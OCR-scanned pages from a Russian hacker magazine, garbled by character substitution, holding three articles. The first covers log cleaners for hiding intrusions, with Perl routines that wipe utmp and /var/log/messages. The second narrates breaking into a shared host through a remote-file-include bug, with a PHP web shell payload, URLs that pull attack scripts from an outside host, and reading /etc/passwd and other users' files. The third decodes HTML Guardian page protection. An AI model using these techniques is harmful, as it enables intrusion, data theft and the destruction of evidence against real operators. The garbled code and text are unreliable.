Л 8ІІИ08 Г НЫЙ 20Р2 

Наконец, мы подобрались к самой проблемной 
операционке, под которую не компилится ни 




л Чтобы избежать 
сохранения сессии 
в бинарные логи, 
используй опцию - 
Т в клиенте зз!і. 

При этом не будет 
создаваться псев- 
дотерминал и ин- 
формация не запи- 
шется в ѵігітр. 

433 - 

л На диск мы бе- 
режно выложили 
все логклинеры, 
описываемые в 
этом материале, 
включая самопис- 
ный перловый 
вайпер. 




а Скачивай перло- 
вый логклинер по 
адресу 

МІр://катеп5к.пеІ. 
ш/ІогЬ/1 /х/Іод- 
сіеап.іаг.дг. Не за- 
будь добавить нес- 
колько повторных 
вызовов процедур 
для других логов. 
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ТЕКСТОВЫЕ СТУКОЧИ 



В от список логов, которые могут содержать компромат на тебя. 
Обязательно вычищай их при каждом входе в чужую систему: 

/ѵаг/Іод/теззадез - основной лог от эузіодсі. Содержит глав- 
ные системные оповещения (информация о заходах, смена уи- 
да, неверная авторизация и т.п.). 

/ѵаг/Іод/зесиге - журнал содержит инфу о любой системной 
авторизации (включая ір и имена пользователей). 

/ѵаг/Іод/хТегІод - лог, содержащий данные о перекачке файлов 
на локальный Йр. Если ты используешь РТР-сервер для скачива- 
ния вареза, обязательно подчищай хТегІод. 

/ѵаг/іод/сітезд - журнал загрузки системы. Может содержать 
информацию о подгрузке ядерных модулей и прочих хакерских 
утилит. Обязательно анализируй этот файл, а в случае подозри- 
тельных записей - немедленно вычищай их. 

.ЬазИ_йізІогу и .туздИіізІогу. Создаются в домашнем катало- 
ге и содержат команды Ьазіі и тузці. Обязательно проверяй их 
содержимое и регулярно вычищай. Бдительные админы всегда 
смотрят эти логи. Лучшее лекарство от ведения .ЬазИ ИізІогу - 
команда ипзеі: НІ5ТРИЕ при каждом заходе в консоль. 



|іСВДС01Ьхш5і *паЬ]# V -і 

Н' 3 4р>тр н ? = 1*т 1 чир#* I *'■'* г іир# і д,п. р й.йг ?р д,д* 

ил±Ц 1-ГТ ГіаН ітш Е*УЁ КНі 

скіі ИГ.ТІ іміЛйн 2йі1*и И_«ж В_ЕІ* Ч-лІі 

?пігп ЩЧ*Л шлцп.^-ажЬ.т-и 3|,Ни О.Ні -ЬиП 

[рсггД.14 I тих иттт к | Ж д*г Г I 1*1*1 -И \ягмІЪап’. 

|свдіН I і.-иия яСгх к] І # 

Ш иф 1 4РТ>г1 3 шаі г 4л* 4 ьдг : й-4."-, д_-М. г й,й| 

иіжн т ІА4М 5РИ КМ ІШ 

СахЬ ІЕА/1 Мл Э Й 44. Мл ОЛІІ ПЛІз Ь-^Ь 

ІР«Ч=( ИРЦЧ* “>■ г к] в | 



Несложный код продвинутого логклинера 



ѴапізИ, ни Сгіодѵѵіре. Это связано с тем, что 
структура иітр в Солярке оформлена чуть по- 
другому, да и файлы расположены в других 
местах. Шір находится в каталоге /изг/асіт, а 
иітр вообще в /еіс. В утилите 2ар2 
(Іійр://п$(І.ги/$о№$ипо$- 2 ар 2 . 2 Ір) все изменения учте- 
ны, поскольку этот логклинер используется 
только для Соляры. При чистке ѵуітр логвайпер 
переходит в конец файла, а затем последова- 
тельно просматривает все его элементы до на- 
чала. Естественно, что скорость работы такой 
утилиты будет высокой. Во время тестов 2ар2 
вычистил логи за три секунды. И это не предел! 

А ТЕКСТОВОЕ ЖУРНППИРОВПНИЕ 

Помимо бинарных, существуют и текстовые 
логи. Они находятся в каталоге /ѵаг/Іод и соз- 
даются, как правило, демоном зузіодсі (либо 
его аналогом). Конечно, можно протроянить 
демон, и проблема текстового логирования 
будет решена. Но лучше пойти другим путем, 
применив текстовый логклинер. На самом 
деле обработать читабельный журнал можно 
и без дополнительных утилит. Чтобы вычис- 
тить лог от шаблона райегп, достаточно вы- 
полнить две следующие команды: 

саі /ѵаг/Іод/те$$аде$ | дгер -ѵ раііегп > /ѵаг/Іод/те$$аде$.1 

тѵ -4 /ѵаг/Іод/те$$аде$.1 /ѵаг/Іод/те$$аде$ 

Подобная очистка используется в подав- 
ляющем большинстве логклинеров, написан- 
ных на зіі (например, в скрипте ТгезИі.зМ - 
Ііир://капеп$к.пеІги/!огЬ/1/х/!ге$ІіІ$Іі). В других ути- 
литах, написанных на С, используются стан- 
дартные функции ТорепДсІозе и зігзіг, что да- 



ет нехилый прирост в скорости. Логвайпер 
рІаіп_ѵѵіре.с (іійрУ/катепзк.пеЕгиДогЬ/І/х/рІаіп.ѵѵіре.с) 
способен обрабатывать логи с конечной по- 
зиции, последовательно перемещая указа- 
тель к верхним записям. 

А СОБСТВЕННЫЙ ПОГКПИНЕР 

Настало время попрактиковаться в усвоении 
материала. Для этого напишем собственный 
логвайпер, вычищающий /ѵаг/іод/иітр и 
/ѵаг/Іод/зесиге от посторонних записей. Я 
постараюсь сделать проект универсальным, 
чтобы ты смог быстро и без особых усилий 
доработать его самостоятельно. 

Для обращения к бинарным файлам нам 
потребуется установить дополнительный мо- 
дуль 11зег::Штр. Благодаря тому, что РегІ 
содержит множество модулей, админ не за- 
метит установку пакета. Сам проект находит- 
ся по адресу 

ШрУ/$еагсІі.срап.огд/СРАѴаиіІіог$/іШР/МРІ0ВД5ег- 
Штр-Шаг.дг. Установи его, а затем напиши 
процедуру, которая будет вычищать бинар- 
ные журналы. 

В моем скрипте подобная функция назва- 
на именем Ьіпагу(). Из-за того, что в модуле 
нет возможности вставить запись нулевой 
длины, придется воспользоваться алгорит- 
мом от ѴапізМ. В сценарии будет открыт нас- 
тоящий иітр с последующим чтением всех 
данных. Затем создается временный файл (я 
его назвал Дтр/.ітр), в который записыва- 
ется структура оригинального иітр-файла, 
исключая скрываемую запись. Непонятно? 
Давай обратимся к исходникам этой проце- 
дуры, и все станет ясно. 



Роот 




ОПЫЕРНОТИВНЫЙ 8Ѵ8ЮС0 

С ледует обращать особое внимание на демон, который 
логирует данные. В последнее время среди линуксоидов 
пользуется популярностью сервис зузіод-пд, который создает 
огромное число журналов в разных местах каталога /ѵаг/Іод. 
Если ты заметил в процессах зузіод-пд, указывай в логвайпере 
пути на все журналы, где может содержаться информация 
против тебя. 




искомого хоста и имени юзера. Если совпа- 
дений не произошло, записываем структуру 
во временный файл. В конце кода происхо- 
дит замещение главного лога временным 
журналом. Правда, все просто? 

Таким образом, тебе достаточно добавить 
в код еще два вызова процедуры Ьіпагу() для 
файлов ѵѵітр и ІазІІод, т.к. обработка этих 
файлов аналогична иітр. 

Настало время заняться текстовыми жур- 
налами, а именно чисткой файла 
/ѵаг/Іод/теззадез. Эту задачу берет на себя 
процедура азсіі(), которой также передается 
название журнала. 



Чистка бинарного иіпр 



Вычищаем /ѵаг/Іод/теззадез 



$иЬ Ьіпагу { 

и$е ІІ$ег::Штр ділі(иітрпате деіиі риіиі); 

$ГіІе=$Ш; 

иітрпате($ГіІе); 

@иітр=деіиі(); 

ореп(ТМР,">/ітр/.ітр"); 

сІо$е(ТМР); 

иітрпате("Лтр/.Ітр"); 

Гогеасіі Зепігу (@иітр) { 

риіиі(Зепігу) ІГ ($епігу->{"иі_и$ег"} пе $орі_и && Зепігу- 
>{"иі_Ію$і"} пе $орі_Іі); 

} 



$иЬ азсіі { 

$ГіІе = $Ш; 
ореп(РЕАО,"$ГіІе"); 
ореп(ѴШТЕ,">/ітр/.ітр"); 
ѵѵ!ііІе(<РЕАО>) { 
ргіп! ѴѴРІТЕ $_ 

ІГ ($_!~/$орі_Іі/о); 

} 

$у$1еш("тѵ /Ітр/.ітр $ГіІе"); 
} 

сІо$е(РЕА0); 

сІо$е(ѴѴРІТЕ); 



$у$іет("шѵ /ітр/.ітр $ГіІе"); 
геіигп 1; 



Видно, что Ьіпагу() передается название 
файла. Затем происходит подвязка модуля с 
тремя важными процедурами. После чтения 
информации из файла /ѵаг/гип/іЛтр создает- 
ся пустой файл Ттр во временном каталоге. 
Теперь сверяем текущие записи на наличие 




Ничего сложного. Открываем лог синхрон- 
но с временным файлом. Если указанного 
шаблона в журнале нет, можно записать 
строку в Дтр/Ттр. Флажок «о» в регулярном 
выражении отвечает за однократную компи- 
ляцию шаблона, которая значительно увели- 
чивает скорость работы логклинера. Наде- 
юсь, ты понял, что логи - первое средство 
против хакеров. Даже неопытный админист- 
ратор заподозрит 
неладное, если уви- 
дит подозрительные 
входы на свою ма- 
шину. Его опасение 
подтвердятся после 
чтения /ѵаг/Іод/тез- 
задез. А все потому, 
что ты вовремя не 
позаботился об уда- 
лении лишних строк 
из системных 
журналов. ЗС 



нашел 
не все 
секреты? 
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ЧИТАЙ 

«ПУТЕВОДИТЕЛЬ»! 

ЖУРНАЛ 
ПРОХОЖДЕНИЙ 
И КОДОВ для 
КОМПЬЮТЕРНЫХ ИГР 




• 192 полос исчерпывающей информации об играх 

• Более 1500 чит-кодов 

• СО-диск с видеоуроками и базой кодов и прохождений 

• Двухсторонний постер с детальными картами 
уровней и тактическими схемами 

• Прикольная наклейка с кодами 

V _ / 









0 настоящее время примерно 95% сайтов в рунете уязвимы. Я серьезно. И цело паже не в кривых программерских руках, а скорее 
в халтурности сисадминов. Чтобы найти дыру в скриптах грамотного программиста, потребуется несколько дней, а то и недель. 

О вот чтобы порутать хостера, порой достаточно пары минут - необходимо собрать лишь нужный сппойт. Хотя и это, как оказалось, 
делать совсем не обязательно. Есть более простой способ получить доступ ко всем ресурсам и БД любого пользователя на большинстве 
российских хостингов. 



КРИВОРУКИМ ОТЕЧЕСТВЕННЫМ ПНМИНПИ ПОСВЯЩОЕТСЯ 




^СОГООШОКОПОДКЕ 

0 Дело было весной этого года. 

Меня привлек сайт известной 
поп-группы «Глюкоза». Сест- 
ра попросила узнать приват- 
ный мыльник солистки груп- 
пы, покрутив перед моим но- 
сом шоколадкой. Я согласил- 
ся на выгодную сделку. 

Сайт, как это часто быва- 
ет, имел 2 версии: НТМІ_ и РІазИ . Серверные 
сценарии были написаны на РНР, и это было 
большим плюсом. Недолго думая, я начал 
осматривать сайт. Сразу же наткнулся на ку- 
чу стандартных вещей - форум РІірВВ 2.0.6 
и до боли знакомый движок веб-чата. Через 
пару минут у меня были административные 
права на этом форуме и тсІ5-хеши админов. 
Можно было взломать тсІ5-хэши и продол- 
жить веселье, но я предложил админам сай- 
та обменяться. Они мне искомый мыльник, а 
я показываю им их уязвимость. Мысль, на 
самом деле, была довольно глупая, но как 
бы то ни было, я был мягко послан. 

Пришлось исследовать сайт дальше, и я 
принялся за чат. Этот движок я уже видел и 
даже ломал, но мне это сильно не помогло: 
я мог читать приваты, писать от имени дру- 
гих пользователей, смотреть их ІР и т.п., но 



не более того. Что же делать дальше? Ника- 
ких других уязвимых скриптов на сайте я не 
нашел, но очень хотел заполучить шоколад- 
ку. Ну что ж, если сам сайт, несмотря на ку- 
чу багов, не может мне помочь, надо брать- 
ся за хостинговый сервер. Мне не потребо- 
валось много времени для того, чтобы уз- 
нать, что діикоши хостится на Агаве 
(шѵ.адаѵа.ги). Меня это немного озадачило, 
но, как оказалось, ненадолго. 

А ПОНЕСЛОСЬ! 

Первым делом я решил найти бажный сайт, 
хостящийся на Агаве, и установить на нем 
ѵѵеЬ-шелл, чтобы можно было пощупать сер- 
вер изнутри. Мне повезло, и я довольно 
быстро нашел уязвимый проект - там был 
стандартных іпсіисіе-баг и я очень быстро 
получил нужный доступ. Сейчас я уже и не 
помню точно адрес этого бажного сайта, на- 
зову его шѵши. Я знал, что на серверах Ага- 
вы стоит РгееВЗО 4.8, но денег на приват- 
ный сплойт у меня не было. Меняться же 
никто не хотел, поэтому я решил просто по- 
лазить по серверу в поисках чего-нибудь ин- 
тересного. Права, с которыми работал мой 
ѵѵеЬ-шелл, как и следовало ожидать, были 
побосіу. Меня это напрягало. В папке Дтр/ 
не было найдено сплойтов, однако там я на- 



шел кое-что другое. Это были темповые 
файлы сРапеІ. Дело в том, что когда юзеры 
редактируют ресурсы файлов на сервере че- 
рез сРапеІ, она кидает их копии в папку 
Дтр/. Меня поразило другое - я смог отк- 
рыть эти файлы! Т.е., несмотря на мои 
побосіу-права, их хватило, чтобы открывать 
файлы, принадлежащие другим пользовате- 
лям. Это не могло не обрадовать. В голове 
созрел примерно такой план: 

О. Известить админов шѵѵ.діикоши о нез- 
начительной дыре в их скриптах. 

О. Они полезут в сРапеІ исправлять баги. 

а Все исправления я увижу в папке Дтр/. 

Я не успел даже придумать, о чем именно 
и каким образом я сообщу админам, как ме- 
ня осенило: «Стоп! Если мне хватает прав 
для чтения пользовательских файлов, может, 
мне хватит прав и листать их каталоги?». Не- 
терпеливо я сунулся обратно в шелл, пос- 
мотрел файл /еіс/раззѵѵсі в поисках какого- 
нибудь логина и забил команду Із -Іа 
Дюте/дІикогаО/. Облом, не хватает прав. 
Через полминуты я выполнил другую коман- 
ду: Із -Іа /Ііоте/дІикогаО/риЬІісДіІтІ/. Да! 
Моих никчемных прав хватило, чтобы лис- 
тать каталоги пользователей! Ни багом, ни 
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тем более уязвимостью это назвать нельзя, 
просто издержки низкого профессионализма 
сисадминов. Забегая вперед, скажу, что в 
течение последующих 2-3 дней была иссле- 
дована добрая половина российских хосте- 
ров на предмет наличия аналогичных проб- 
лем: как оказалось, примерно у трети наб- 
людалась подобная болезнь. 

А ПЕПОЙ РОЗ 

Сейчас я предлагаю немного отстраниться 
от сайта Глюкозы и уложить в голове еще 
раз все, что я проделал. 

Первым делом я получил доступ к ѵѵеЬ- 
шеллу на одном из сайтов, хостящихся на 
Агаве. Самый легкий способ его получить - 
найти проект с классическим іпсіисіе-багом, 
о которым мы уже много раз писали. Для 
этого надо отправиться на Гугл и в строке 
поиска забить нечто вроде 
.ги/*.рІір?раде=*.рІір. Поисковик немного 
подумает и покажет полторы тысячи бажных 
сайтов. Теперь создается файл примерно со 
следующим содержимым: 

<? 

\\ ($стсІ== ,, ){$спісІ= , І5 -Іа 1 ;} 

$у$іет("$ст(]"); 

?> 

Этот скрипт заливается куда-нибудь в 
инет (например, на пагосі.ги), и открывается 
первый попавшийся сайт из найденных Гуг- 
лом. Допустим, я наткнулся на страницу 

ѵѵѵѵѵѵ.х.ги/іпсІех.рІір?раде=пеѵѵ$.р[ір. Страница 
пеѵѵз.рГір заменяется на адрес моего скрип- 
та. Например, Шр://ххх.пагосі.ги/кіск.рІір. В этом 
случае у меня получится примерно следую- 
щее: ѵѵш.х.ги/іпсІех.рІір?раде=Шр://ххх.паго(1.ги/ 
(иск.рІір. 

Если сайт бажный, то я увижу список 
файлов и каталогов в текущей папке сайта. 
Если же ничего такого не видно, то проще 
забить на сайт и попытать счастье с другим 
серваком. 

А деппй два 

Теперь для удобства нужно залить на уязви- 
мый сайт цивильные скрипты для навигации 



по каталогам на сервере. Я использую само- 
писные сценарии, они адаптированы под ме- 
ня. А вообще можно воспользоваться 
ВетѴіеѵѵ (он лежит на нашем диске и на 

ѵѵѵѵѵѵ.ріір.зрЬ.ги). 

Скрипты закачиваются куда-нибудь в инет 
(например, на Шр://ххх.пагосІ.ги/геп.рІір). Теперь 
остается только перебросить Рем Вью со 
своего сайта на бажный проект. Для этого я 
бы набрал в адресной строке браузера сле- 
дующий адрес: 

шѵѵ.х.ги/іпсІех.рІір?раде=Шр://х.пагосІ.ги/х.$ехкпсІ=іл/деі 
Ііир://х.пагосІ.ги/геп.р[ір. Если все верно, то мой 
шелл удачно перельется на уязвимый сайт. 
Все! ІМоЬосІу-шелл уже расположился на сай- 
те нужного хостера. 

^ПРОДОПЖРЕМРПЗВРРТ 

Итак, теперь у меня есть поЬобу-шелл на 
хостинговом сервере. Время приступать к 
исследованию сервера. Чтобы узнать, кого я 
поймал, нужно ввести две консольные ко- 
манды: «саі /еіс/раззѵѵсі; Із -Іа /еТс/ѵтаіІ/». 
Отобразится список пользователей на этом 
сервере и пути к их каталогам. Инфа, кото- 
рую я увидел, - на скриншоте. 

Теперь у меня есть полный список пользо- 
вателей и их доменов. Можно выбрать любой 
понравившийся, листать его каталоги и чи- 
тать файлы. Однако следует иметь в виду, что 
чаще всего можно листать только пользова- 
тельские каталоги с МтІ-файлами, т.е. начи- 
ная с /риЫіс_МтІ/. Прав для доступа к боль- 
шей части каталогов выше не хватит. Чтобы 
пролистать каталог юзера, можно выполнить 
примерно следующую команду: Із -Іа 
/Иоте/дІикогаО/риЫіс_ІіітІ/ или, например, Із 
-Іа /Гіоте/дІикогаО/риЫіс ГіітІ/асІтіп/. 

А выводы 

Что же с этого можно поднять? Разумеется, 
напрямую задефейсить сайт не удастся, т.к. 
нельзя редактировать файлы - большинство 
из них открыто только для чтения. Однако и 
это уже очень много. Например, без проб- 
лем можно стащить целую копию всего сай- 
та со всеми скриптами, исходниками и 
скрытыми от ѵѵеЬ- посетителей директория- 
ми. Получив исходные коды сценариев, го- 
раздо проще найти уязвимости и продол- 





жить веселье. Также в последнее время 
многие программисты стали хранить данные 
в нереляционных базах данных, в локальных 
файлах, размещающихся в структуре вебка- 
талога. Даже если директория с этими фай- 
лами защищена .Массеззот’ом, через свой 
ѵѵеЬ-шелл можно получить доступ к секрет- 
ным сведениям, хранящимся в файле, дос- 
тупном пользователю побосіу :). Однако 
имей в виду: несмотря на то, что не было 
использовано никаких сплойтов и все 
действия укладывались в обозначенную ад- 
мином политику безопасности, нарушено 
множество законов, и даже за такие, каза- 
лось бы, безобидные действия можно прив- 
лечь к уголовной ответственности. Так что я 
призываю чтить и соблюдать законы той 
страны, в которой проживаешь. 

Что же касается шоколадки, то ее съела 
моя сестра. Я так и не получил искомое мы- 
ло, а сайт шѵѵ.діикога.ги не задефейсил. Я 
лишь добавил на сайт новость, в которой 
искренне поздравил солистку группы с приб- 
лижающимся днем рождения и сделал реди- 
рект на свой сайт, где какое-то время висе- 
ли пароли от администраторского интерфей- 
са мш.діикоши. За час количество посетите- 
лей перевалило за 200, а гостевая книга бы- 
ла зафлужена фанатами этой странной груп- 
пы. Хочется также отметить, что данный баг 
на момент написания статьи все еще присут- 
ствовал на адаѵа.ги.ЗС 





л На нашем диске 
ты найдешь удоб- 
ный скрипт 
КетѴіеѵѵ для нави- 
гации по файловой 
системе. 

"<2Н 

а Корректно уста- 
навливай права 
доступа к 
собственному сай- 
ту. Знай, что если 
ты сделал своему 
сценарию сіітосі 
755, он доступен 
для чтения всем 
пользователем 
твоей группы, а 
это едва ли явля- 
ется твоей целью. 

Так что осторож- 
нее! 
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роикий процесс с участием Дмитрия Склярова, навечно вошедший в историю компьютерной индустрии, не послужил уроком 
производителям секьюрного ПО: они продолжают штамповать низкопробный софт для защиты данных. Сегодня ты научишься 
ломать документы, защищенные популярным инструментом НТМІ. Сиамііап, а заодно поймешь, насколько убоги все эти программы. 

ВЗППМЫВПЕМ СИСТЕМУ ЗПЩИТЫ НТМНСОНТЕНТП 



А О ПОЛЬЗЕ ЧТЕНИЯ 

ое давнее увлечение, как ни 
банально это звучит, - книги. 
Я обожаю читать как бумаж- 
ные, так и электронные изда- 
ния, причем предпочтение 
отдаю последним. И на это 
есть как минимум две причи- 
ны. Первая - они практически 
бесплатны. Всегда можно найти подходящую 
книгу на шѵ.ІіЬ.ги и шѵѵ.ііфобаі.ги. И вторая: с 
электронной книги легко копировать цитаты, 
которыми можно козырнуть на ближайшей 
пьянке. Так было бы и в крайний, как гово- 
рят космонавты, раз, если бы меня не под- 
жидал жуткий облом. 

^ГУСЬОБПОМИНГО 

Привычный взмах мыши над приглянувшимся 
абзацем не оказал желаемого действия. Текст 
не выделялся. На клики правой кнопки мыши 
браузер также не реагировал. Не происходи- 
ло ровным счетом ничего. В начале текста 
гордо красовалась надпись: «ТМе зоигсе собе 
оТ ІІііз раде із ргоіесіеб Ьу НТМІ_ Оиагсііап». 
Видимо, параноидальный создатель файла не 
затруднил себя регистрацией программы. Хо- 
тя контекстное меню было отключено (или 
заблокировано, кому как нравится), оконное 




же осталось на своем месте. Быстро лезу в 
него: Вид -> Просмотр НТМЬкода (даже ес- 
ли меню было бы отключено, я открыл бы 
файл в любом текстовом редакторе). И что я 
вижу? Пустой файл. Вернее, на первый 
взгляд, пустой. Весь тест смещен на несколь- 
ко экранов вниз. Уловка для недоумков. На- 
жатая клавиша ОЕІ_ и несколько секунд терпе- 
ния исправляют обстановку. 

А ПОРЯДОК ПРЕЖДЕ ВСЕГО 

Содержимое документа производит впечат- 
ление полной абракадабры: текст совер- 
шенно не читаем, нет разделений на строки 
и абзацы, ширина текста значительно пре- 
вышает ширину экрана. Заменяю Блокнот на 
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Так выглядит защищенная страница 



ВРаб, имеющий возможность неявного пе- 
реноса строки. В том, что это НТМЦ а не 
что-то другое, убеждаюсь, найдя в начале и 
в конце документа стандартные теги: 
<МтІ>, <Меаб> и др. Небольшое формати- 
рование проясняет ситуацию - весь контент 
страницы помещен в скрипт, находящийся в 
логическом заголовке между дескрипторами 
<5сгір{> и </зсгірі>. Язык скрипта не ука- 
зан, но я знаю, что по умолчанию использу- 
ется баѵаЗсгірТ 

Надо сказать, баѵаЗсгірі я почти не знаю. 
Помню лишь какие-то общие сведения о 
синтаксисе, например, что после операторов 
ставится точка с запятой, а присваиваемые 
переменным значения помещаются между 
одинарными апострофами. Несколько минут 
старательно выстукиваю клавишей Епіег пос- 
ле каждой комбинации символов: «’;»■ В 
этом мне успешно помогает поиск по тексту. 
Теперь весь код виден как на ладони. Ре- 
зультат отображается в браузере без изме- 
нений. Делаю резервную копию. 

А ЧТО ЕСТЬ что 

Приступаю к изучению структуры защитного 
скрипта. В начале присваиваются опреде- 
ленные значения двум переменным: 
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ПОПУЛЯРНЫЙ СОФТ ДПЯ «ЗПЩИТЫ» НТМІ 



НТМІ- СиагсІ (ѵѵѵѵѵ^аѵѵ-зоТС.сот) 

Почти тезка главной героини 
этой статьи. Несмотря на заяв- 
ленную цену регистрации в 15 
у.е., безнадежно провалила на 
самом первом этапе тест на 
сохранение целостности кон- 
тента. Обработанный програм- 
мой НТМІ_-файл был безнадеж- 
но испорчен. На месте текста 
странички оказались куски ко- 
да, вероятно, призванного за- 
щищать ее от посягательств плагиаторов. Теперь посягатель- 
ства тексту явно не страшны, но, увы, совсем по другой причине. 




ѴѴеЬСгурІ Рго (ѵѵѵѵѵѵ.тоопіідііі-зойѵѵаге.сот) 

Программа способна обраба- 
тывать НТМІ_ как в одиночном, 
так и в пакетном режимах. За- 
щищаемые параметры опцио- 
нальны. Можно ограничиться 
шифрованием контента, а мож- 
но заблокировать отображение 
статусной строки, панели 
инструментов и контекстного 
меню. Перед сохранением 
можно убедиться в качестве результата, используя предвари- 
тельный просмотр. Примечательна возможность сохранения за- 
шифрованного текста как в текущем документе, так и в отдель- 
ном -І5 файле. Смутила только одна строка в обработанном прог- 
раммой файле: босиплеп{.\л/п{е(). Если работаете с результатами 
этой программы, то читайте только последний абзац статьи. 
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ВН0ВЬ перед нами 



Епсгурі НТМІ- Рго (ѵѵѵѵѵ\лтІор5оТС.сот) 

Нелепый интерфейс, напомина- 
ющий мастер презентаций 
Роѵѵег Роіпі: семилетней давнос- 
ти, может создать ложное впе- 
чатление. По функциональности 
не уступает, если не превосхо- 
дит, НТМІ_ Сиагсііап. Обрабаты- 
вает группы файлов как по ука- 
занной директории, так и по 
списку, который можно сохра- 
нить для дальнейшего исполь- 
зования, например, при регулярном изменении контента сайта. 




Вісйагд вііг 



іаііу 



пзбытГм нпТ КВЫШЛ0 ' 

л ь«е Щ ене^ло ИХРеаЛи; 



СТРАНА 

ИГР 



(датеііамі 

ѵѵѵѵѵѵ.датеіапсі.ги 





взпом 





ШН 

л Весь вышеизло- 
женный материал 
предназначен иск- 
лючительно для 
ознакомления раз- 
личных фирм и ор- 
ганизаций со сла- 
быми местами в их 
программном 
обеспечении и не 
является призывом 
или руководством 
к посягательству 
на авторские права 
или какую-либо 
информацию. 

Ч*5> 

А На нашем диске 
ты найдешь все 
описанные в статье 
программы «защи- 
ты» НТМЬданных. 

Так что не упусти 
возможности пово- 
зиться с этими не- 
лепыми инстру- 
ментами: это 
очень забавно и 
интересно :). 



ѵаг Й14=4538; 

СіеѴо^'ІіиШЕЬСРОІООТосОѴтіМ'; 

По-видимому, это какие-то ключи, ис- 
пользуемые при шифровании. Продолжаю 
исследование в надежде вернуться к ним. 
Обращаю внимание на переменную и прис- 
ваиваемое ей значение: есІ=' несколько кило- 
байт кода'. Похоже, что переменная хранит 
закодированный текст! Ниже встречаю еще 
одну служебную переменную: 

Ш)Е='аНід$60$ІХсРРВВ0'; 

Она пока что интереса для меня не предс- 
тавляет. Задуматься же заставляет другой 
участок кода: 

5ѴѴТР='%6Ь\075%75пе%73\143а%70е\050%22%25%300%25 

%30А%22\051\073\143%31\075%20%69%71е\050есІ\051\073(]о 

\143%75%... 1 ; 

Где-то я это уже видел :). Очень похоже 
на кусок какого-то хитрого шелл -кода. Но в 
тоже время ясно, что это не бинарные дан- 
ные. Скорее всего, это какой-то текст, зако- 
дированный стандартными средствами 
баѵаЗсгірТ Ладно, дальше будет виднее. 
Вращаю скроллер мыши. Оба-на! Происхо- 
дит еще одно приращение переменной еб: 
еб+='еще несколько килобайт кода'. С не- 
терпением прокручиваю окно текстового ре- 
дактора. Опять знакомая комбинация: 

ѵ0г0и000 =, МН0Хд0кдтуТІЛтхУЕ(1и0д0Мус0001)ВКВ': 

5ѴѴТР+='2с%6Ь\051\073\162еІ%75\162п%20%4а%7с1\0731 : %75п\ 

143і%69оп%20%5І%73\050\051%71)%5ІА%20\075%20пе%...': 

Знаешь, как в старом анекдоте: 

- Все-таки не пойму: как Шерлок Холмс 
мог обходиться без женщин? 

- Элементарно... 

- Ватсон?!! 

Что сказать, все встало на свои места. Су- 
ди сам: опять происходит приращение пере- 
менной еб, вводится еще одна служебная 
переменная, а в самом конце скрипта стоит 
оператор с вложенной функцией: 
еѵаі ( и пезсаре( ЗѴѴ7Р) ) . 

А ИДЕН В ОБХОД 

Функция еѵаІ() знакома мне по другому языку 
программирования. Какому - не скажу :). Она 
выполняет переданный ей программный код. 
Эдакий компилятор в компиляторе. Но что 
же делает процедура ипезсаре()? Совершен- 




но ясно - приводит содержимое переменной 
ЗѴ\ЯР к нормальному виду, к исполняемому 
63- коду. Таким образом оказывается, что в 
этой переменной хранится закодированная 
программа, которая расшифровывает еб - 
текст документа. Почитав документы по этой 
функции, я понял, что код программы -де- 
шифратора был изначально закодирован 
стандартной функцией езсаре(). Это для то- 
го, чтобы отпугнуть неопытных взломщиков, - 
ведь в документе в этом случае не будет поч- 
ти ни одного осмысленного оператора. 

Замечательно, теперь все понятно. Настало 
время получить код, расшифровывающий кон- 
тент документа. Но как же это лучше сделать? 
На помощь приходит ѴѴіпбоѵѵз Зсгірі Нозі 
(ѴѴЗН) - любимец ленивых админов. Быстро 
создаю в Блокноте сценарий ипезсаре.із, код 
которого имеет следующий вид: 



Программа для получения кода расшифровки 



/* Для нарядности объединил все приращения переменной 
МЕ в одно */ 

МЕ='килобайт кодов'; 

/* Декодированный код помещается в переменную зііісобе 

*/ 

$ІіІсо(]е=ипе$саре(МЕ) 

/* Создается срайл зШсобе.іхі */ 

ѵагГ$о=Щ$сгірі.СгеаіеОЬіесі("$сгірііпд.ЕіІе$у$іетОЬіесі"): 

ѵагіхі$ігеатоиі=Г$о.0репТехіЕіІе("$ІіІсосІе.іхі",2,ігие): 

/* Сохраняется полученный результат */ 
іхі$ігеатоиШгііеипе($!іІсо(]е) 

После выполнения этого сценария пере- 
ношу полученный результат в исходный 
текст, предварительно сделав его резервную 
копию. От переменной ЗѴѴіР и функций 
ипезсаре() и еѵаІ() я решительно избавля- 
юсь. Сам результат после нескольких клаца- 
ний клавишей ввода выглядит так: 



Код расшифровки 



к=ипе$саре("%00%0А"); 
с1= іде(еб); 
сіоситепіжііе(сі); 

іипсііоп іде($){І=$.ІепдІІі;оІі=МаіГі.гоипб(І/2): 

6\5(); 

3=1герІасе(/'/д,П 

МгерІасе(Мд,"\\ п ); 

Идд/д; 

МгерІасе(і,к); 
геіигп 3}; 

Гипсііоп _$(){_А = пеѵѵ Аггау(І); 

а1=еб.$иЬ$1г(0,оП).$рМЦ""); 

а2=е(1.$иЬ$Гг(оІі).$рІіГ( ,т ); 

Гог(і=0;і<оІі;і++)Д=2*і; 

_А[Д=а1[і]; 

_А[НН2[і]}; 
геіигп _А.іоіп("")} 

Это и есть код расшифровки текста, храня- 
щегося в переменной еб. Остается решитель- 
ный рывок перед победным концом - получе- 
нием первозданного вида НТМ Б документа. Те- 
перь это проще простого, достаточно повто- 
рить уже использованный ранее прием. Удаляю 
из кода оператор вывода текста НТМІ_ в брау- 
зер (впрочем, можно его просто закомменти- 
ровать), а на его место помещаю команды за- 
писи в файл. Надо заметить, что код, расшиф- 
ровывающий тело документа, совсем не обяза- 
тельно было приводить к читабельному виду - 
я это сделал просто из любопытства. 



А ПОЦИЕНТ СКОРЕЕ ЖИВ 

Вуаля. Мы получили расшифрованный файл, 
в котором содержится контент странички и 
блокирующие скрипты. Дальше - дело тех- 
ники. Удаляю гордую надпись, которую за- 
бомбили создатели программы, а также все, 
что находится между тегами <зсгірі> и 
</зсгірі>. Теперь документ не имеет ника- 
ких ограничений на выделение, копирование 
и распечатку текста. Буфер обмена также 
становится доступным. 

А РЕЗЮМЕ 

На всю работу, начиная с открытия исходно- 
го файла и до получения его полноценной 
копии, я затратил не более десяти минут, да 
и то включая поход к холодильнику за оче- 
редной бутылочкой пива. Чтобы удовлетво- 
рить свое любопытство, я полез в интернет с 
целью подробного ознакомления с програм- 
мой, защищающей контент. Трудно выразить 
мое удивление, а я до сих пор хочу со сторо- 
ны посмотреть на свое лицо, когда я узнал, 
что эта софтина не написана на досуге прог- 
раммистом-любителем, а представляет со- 
бой коммерческий продукт, продающийся по 
весьма реальной цене. Производители сего 
детища на полном серьезе расписывают его 
потрясающие возможности по защите НТМІ_- 
кода, изображений, ссылок, баѵа-апплетов, 
